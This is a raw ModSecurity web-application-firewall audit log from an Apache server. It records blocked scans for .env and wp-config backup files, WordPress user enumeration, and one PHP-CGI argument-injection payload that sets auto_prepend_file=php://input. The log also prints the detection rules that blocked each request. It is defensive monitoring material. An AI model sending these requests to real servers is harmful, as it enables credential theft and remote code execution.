Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b457d452-Z-- --c5446600-A-- [20/Apr/2025:22:06:38 +0700] aAUNflTf0pL9EQC7JDUjbQAAAEA 103.236.140.4 51962 103.236.140.4 8181 --c5446600-B-- GET /dev/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --c5446600-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5446600-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745161598583928 759 (- - -) Stopwatch2: 1745161598583928 759; combined=300, p1=266, p2=0, p3=0, p4=0, p5=34, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5446600-Z-- --87f12f5b-A-- [20/Apr/2025:22:06:39 +0700] aAUNf1Tf0pL9EQC7JDUjbgAAAFQ 103.236.140.4 51968 103.236.140.4 8181 --87f12f5b-B-- GET /application/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --87f12f5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87f12f5b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745161599936861 730 (- - -) Stopwatch2: 1745161599936861 730; combined=288, p1=257, p2=0, p3=0, p4=0, p5=31, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87f12f5b-Z-- --cec26969-A-- [20/Apr/2025:22:18:09 +0700] aAUQMVTf0pL9EQC7JDUkCQAAAE0 103.236.140.4 54634 103.236.140.4 8181 --cec26969-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 165.22.235.3 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 165.22.235.3 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --cec26969-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cec26969-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745162289001344 653 (- - -) Stopwatch2: 1745162289001344 653; combined=239, p1=216, p2=0, p3=0, p4=0, p5=23, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cec26969-Z-- --145c9b21-A-- [20/Apr/2025:22:27:56 +0700] aAUSfFu16wJWB6g0mU8cmwAAABY 103.236.140.4 57492 103.236.140.4 8181 --145c9b21-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --145c9b21-C-- --145c9b21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --145c9b21-E-- --145c9b21-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745162876011773 4525 (- - -) Stopwatch2: 1745162876011773 4525; combined=3029, p1=545, p2=2454, p3=0, p4=0, p5=30, sr=124, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --145c9b21-Z-- --8ee4ea3e-A-- [20/Apr/2025:23:02:08 +0700] aAUagEAzeWrUIk0gvAs5fQAAANg 103.236.140.4 37292 103.236.140.4 8181 --8ee4ea3e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.141 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.145 Safari/537.36 Vivaldi/2.6.1566.49 Accept-Charset: utf-8 --8ee4ea3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ee4ea3e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745164928525785 802 (- - -) Stopwatch2: 1745164928525785 802; combined=341, p1=305, p2=0, p3=0, p4=0, p5=36, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ee4ea3e-Z-- --c430c87e-A-- [20/Apr/2025:23:55:06 +0700] aAUm6lTf0pL9EQC7JDUqeAAAAFA 103.236.140.4 49722 103.236.140.4 8181 --c430c87e-B-- GET /.well-known/pki-validation/wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 52.230.121.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.230.121.51 X-Forwarded-Proto: http Connection: close --c430c87e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c430c87e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745168106815164 800 (- - -) Stopwatch2: 1745168106815164 800; combined=267, p1=228, p2=0, p3=0, p4=0, p5=38, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c430c87e-Z-- --69e4fc15-A-- [21/Apr/2025:00:17:44 +0700] aAUsOMTCDeBrh52UaHTO6QAAAJI 103.236.140.4 55588 103.236.140.4 8181 --69e4fc15-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 188.166.108.93 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 188.166.108.93 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --69e4fc15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69e4fc15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745169464654402 1093 (- - -) Stopwatch2: 1745169464654402 1093; combined=457, p1=417, p2=0, p3=0, p4=0, p5=40, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69e4fc15-Z-- --4531b50f-A-- [21/Apr/2025:01:31:48 +0700] aAU9lEAzeWrUIk0gvAtlPAAAANI 103.236.140.4 56458 103.236.140.4 8181 --4531b50f-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 157.245.113.227 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 157.245.113.227 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --4531b50f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4531b50f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745173908161929 864 (- - -) Stopwatch2: 1745173908161929 864; combined=382, p1=348, p2=0, p3=0, p4=0, p5=33, sr=146, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4531b50f-Z-- --1c459339-A-- [21/Apr/2025:02:03:37 +0700] aAVFCcTCDeBrh52UaHQKjAAAAI0 103.236.140.4 41088 103.236.140.4 8181 --1c459339-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.141 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.1 Accept-Charset: utf-8 --1c459339-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c459339-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745175817448557 908 (- - -) Stopwatch2: 1745175817448557 908; combined=368, p1=328, p2=0, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c459339-Z-- --9d850c09-A-- [21/Apr/2025:03:27:57 +0700] aAVYzUAzeWrUIk0gvAuEmwAAAMk 103.236.140.4 40530 103.236.140.4 8181 --9d850c09-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.49.169 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.49.169 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9d850c09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d850c09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745180877249407 782 (- - -) Stopwatch2: 1745180877249407 782; combined=310, p1=275, p2=0, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d850c09-Z-- --a45fe228-A-- [21/Apr/2025:03:57:46 +0700] aAVfypjcgo97ICfbW9PdEAAAABY 103.236.140.4 47956 103.236.140.4 8181 --a45fe228-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/67.0.3396.99 Chrome/67.0.3396.99 Safari/537.36 Accept-Charset: utf-8 --a45fe228-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a45fe228-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745182666275282 888 (- - -) Stopwatch2: 1745182666275282 888; combined=381, p1=346, p2=0, p3=0, p4=0, p5=35, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a45fe228-Z-- --da04a15b-A-- [21/Apr/2025:04:28:27 +0700] aAVm-3fk8_rbvOkGr1q8-AAAAJA 103.236.140.4 55000 103.236.140.4 8181 --da04a15b-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 206.189.19.19 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 206.189.19.19 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --da04a15b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da04a15b-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745184507837793 821 (- - -) Stopwatch2: 1745184507837793 821; combined=325, p1=288, p2=0, p3=0, p4=0, p5=37, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da04a15b-Z-- --6d893b26-A-- [21/Apr/2025:05:04:46 +0700] aAVvfpjcgo97ICfbW9PhTAAAABM 103.236.140.4 35442 103.236.140.4 8181 --6d893b26-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.42.129.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.42.129.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6d893b26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d893b26-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745186686287126 3595 (- - -) Stopwatch2: 1745186686287126 3595; combined=1527, p1=505, p2=991, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d893b26-Z-- --58c49441-A-- [21/Apr/2025:05:52:12 +0700] aAV6nHgNnYly62OFre4zXAAAAE0 103.236.140.4 46822 103.236.140.4 8181 --58c49441-B-- GET /wp-config.php.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 82.165.85.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 82.165.85.33 X-Forwarded-Proto: http Connection: close Accept: */* --58c49441-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58c49441-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745189532709965 812 (- - -) Stopwatch2: 1745189532709965 812; combined=306, p1=268, p2=0, p3=0, p4=0, p5=38, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58c49441-Z-- --8001206f-A-- [21/Apr/2025:06:20:07 +0700] aAWBJ5jcgo97ICfbW9PnBQAAAAk 103.236.140.4 53216 103.236.140.4 8181 --8001206f-B-- GET /wp-config.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 74.208.58.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 74.208.58.4 X-Forwarded-Proto: http Connection: close Accept: */* --8001206f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8001206f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.old" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745191207452359 804 (- - -) Stopwatch2: 1745191207452359 804; combined=304, p1=263, p2=0, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8001206f-Z-- --7932a545-A-- [21/Apr/2025:07:25:58 +0700] aAWQlngNnYly62OFre44VAAAAE8 103.236.140.4 40568 103.236.140.4 8181 --7932a545-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.19 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Android; Mobile; rv:35.0) Gecko/35.0 Firefox/35.0 Accept-Charset: utf-8 --7932a545-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7932a545-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745195158358228 813 (- - -) Stopwatch2: 1745195158358228 813; combined=364, p1=324, p2=0, p3=0, p4=0, p5=39, sr=116, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7932a545-Z-- --5ebcca0e-A-- [21/Apr/2025:07:32:13 +0700] aAWSDZjcgo97ICfbW9PszwAAAAM 103.236.140.4 42032 103.236.140.4 8181 --5ebcca0e-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 134.209.25.199 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 134.209.25.199 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --5ebcca0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ebcca0e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745195533902190 794 (- - -) Stopwatch2: 1745195533902190 794; combined=292, p1=257, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ebcca0e-Z-- --6b0edf2d-A-- [21/Apr/2025:07:45:35 +0700] aAWVL3fk8_rbvOkGr1rHJQAAAIQ 103.236.140.4 45118 103.236.140.4 8181 --6b0edf2d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.99 Accept-Charset: utf-8 --6b0edf2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b0edf2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745196335351012 836 (- - -) Stopwatch2: 1745196335351012 836; combined=379, p1=338, p2=0, p3=0, p4=0, p5=41, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b0edf2d-Z-- --0176fd70-A-- [21/Apr/2025:07:51:54 +0700] aAWWqngNnYly62OFre45wgAAAEg 103.236.140.4 46616 103.236.140.4 8181 --0176fd70-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: ) Accept-Charset: utf-8 --0176fd70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0176fd70-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745196714104936 891 (- - -) Stopwatch2: 1745196714104936 891; combined=418, p1=377, p2=0, p3=0, p4=0, p5=41, sr=149, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0176fd70-Z-- --9f3ffe75-A-- [21/Apr/2025:08:27:39 +0700] aAWfC3gNnYly62OFre47pQAAAE8 103.236.140.4 54890 103.236.140.4 8181 --9f3ffe75-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.49.169 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.49.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9f3ffe75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f3ffe75-H-- Message: Access denied with code 403 (phase 1). 
